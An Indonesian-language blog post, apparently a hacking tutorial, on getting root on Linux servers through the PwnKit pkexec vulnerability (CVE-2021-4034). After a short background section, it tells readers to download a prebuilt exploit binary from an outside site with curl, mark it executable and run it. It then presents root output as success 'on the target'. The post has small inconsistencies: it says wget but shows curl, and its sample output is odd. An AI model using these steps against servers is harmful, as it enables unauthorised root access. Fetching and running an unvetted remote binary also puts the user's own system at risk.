Cara Rooting Server Metode Exploit Pkexec (PwnKit | CVE-2021-4034)

Hallo, 

Kembali lagi di Evil Twin - Blog, Sudah lama blog ini tidak update artikel dikarenakan sibuk dengan kehidupan masing-masing.

Oke pada artikel kali ini Saya akan menulis artikel dengan judul Cara Rooting Server Metode Exploit Pkexec (PwnKit | CVE-2021-4034)

Silahkan baca artikel ini sampai selesai agar tidak terjadi gagal paham.

Tentang Polkit Pkexec Untuk Linux

Sebelum ke tutorialnya, ada baiknya kita mengetahui terlebih dahulu Tentang Polkit pkexec untuk Linux.

Polkit (sebelumnya PolicyKit) adalah komponen untuk mengontrol hak istimewa seluruh sistem dalam sistem operasi mirip Unix. Ini menyediakan cara yang terorganisir untuk proses yang tidak memiliki hak istimewa untuk berkomunikasi dengan proses yang memiliki hak istimewa. Dimungkinkan juga untuk menggunakan polkit untuk menjalankan perintah dengan hak istimewa yang lebih tinggi menggunakan perintah pkexec diikuti dengan perintah yang dimaksudkan untuk dieksekusi (dengan izin root).

Sumber : https://blog.qualys.com/vulnerabilities-threat-research/2022/01/25/pwnkit-local-privilege-escalation-vulnerability-discovered-in-polkits-pkexec-cve-2021-4034

Potensi Dampak Kerentanan PwnKit

Jika sudah mengetahui Tentang Polkit pkexec untuk Linux, Sekarang tinggal mengetahui Potensi Dampak Kerentanan PwnKit.

Eksploitasi yang berhasil dari kerentanan ini memungkinkan setiap pengguna yang tidak memiliki hak untuk mendapatkan hak akses root pada host yang rentan.

Mendapatkan Akses Root

Untuk mempersingkat artikel ini, Kita langsung saja ke tutorial mendapatkan akses root menggunakan metode ini.

Versi kernel yang sudah dicoba dan berhasil adalah 2.6.32, 3.10.0, 3.16.0, 4.4.0, 5.3.0, 5.4.0, 4.9.0

Oke lanjut ke step mendapatkan akses rootnya.

Pertama-tama, Kita langsung saja mendownload exploitnya melalui wget, curl dan sebagainya.

Pada artikel kali ini Saya contohkan menggunakan wget, Perintahnya adalah sebagai berikut:

curl https://eviltw.in/files/pwnkit.txt -o pwnkit
chmod +x pwnkit

Jika perintah/command diatas berhasil tereksekusi, Tinggal jalankan saja PwnKit nya

./pwnkit "id"

Command diatas untuk mengecek id, Jika muncul seperti ini: uid=0(firefart) gid=0(root) groups=0(root),33(www-data)

Maka Kalian sudah sukses mendapatkan akses root pada target (Exploitasi berhasil!)

Akhir Kata

Oke mungkin cukup sampai disini aja artikel tentang Cara Rooting Server Metode Exploit Pkexec (PwnKit | CVE-2021-4034)

Jika ada kekurangan/kesalahan kata dan sebagainya, Silahkan beri tahu melalui kolom komentar.

Terimakasih, Semoga bermanfaat!